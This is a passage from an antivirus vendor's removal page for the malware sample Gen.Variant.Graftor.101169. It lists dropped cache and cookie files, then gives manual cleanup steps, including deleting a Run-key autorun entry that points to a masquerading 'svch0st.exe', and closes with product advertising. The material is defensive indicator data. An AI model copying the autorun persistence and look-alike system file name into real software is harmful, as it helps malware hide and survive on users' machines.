C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\atwho[1].css (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KT1K30BI.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\f[1].txt (32473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\8A4F0C723F1C[1].htm (1037 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9G85COVJ.txt (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\f[2].txt (45405 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[1].htm (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[2].js (183126 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[3].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\8A4F0C723F1C[1].htm (1646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery.qtip[1].css (5095 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[1].js (53658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906161765;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\zenicon[1].eot (32766 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\f[1].txt (44885 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[4].htm (747 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\quant[1].js (5334 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\bnr[1].htm (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1THAFJKQ.txt (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\slide[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\BD5T0HI7.txt (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\com.talker.class[1].js (650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\bnr[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\OZDIKCNB\coinsns[1].xml (595 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\geetest.5.10.0[1].js (16175 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\8A4F0C723F1C[1].htm (2336 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\index[1].htm (9288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\slide[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ca-pub-5722932343401905[1].js (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\magnific-popup[1].css (3573 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5FM6I276.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[1].htm (2984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[2].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[1].htm (2984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads[2].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WRQMQYSP.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[1].htm (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\index[1].htm (8716 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5D0QW9Y1.txt (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\check[1].css (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[4].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\lottery[1].css (11456 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\style.3.2.0[1].css (5024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[5].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\H49OIM3X.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\script.packed[1].js (24186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[5].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\js[3].js (432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[3].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\c=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\zui[1].css (84707 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KZ8SJFUR.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\core[1].css (25346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\radialIndicator.min[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\c=n;dst=1;et=1484906135298;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\zrt_lookup[1].htm (5608 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EY6YFA77.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\analytics[1].js (14647 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\show[2].htm (1492 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\show[4].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\show[5].htm (746 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\geetest.0.0.0[1].js (16202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ads[4].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery.iframe-transport[1].js (1298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJIU3XS6.txt (225 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\lazyload[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\c=n;dst=1;et=1484906153069;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show[1].g (35 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[1].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ads[3].htm (603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\size1[1].css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\zui-theme[1].css (2422 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GuaZhuan" = "C:\Windows\system32\svch0st.exe -autorun"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Graftor.101169_5ce023bff6

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Graftor.101169_5ce023bff6

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet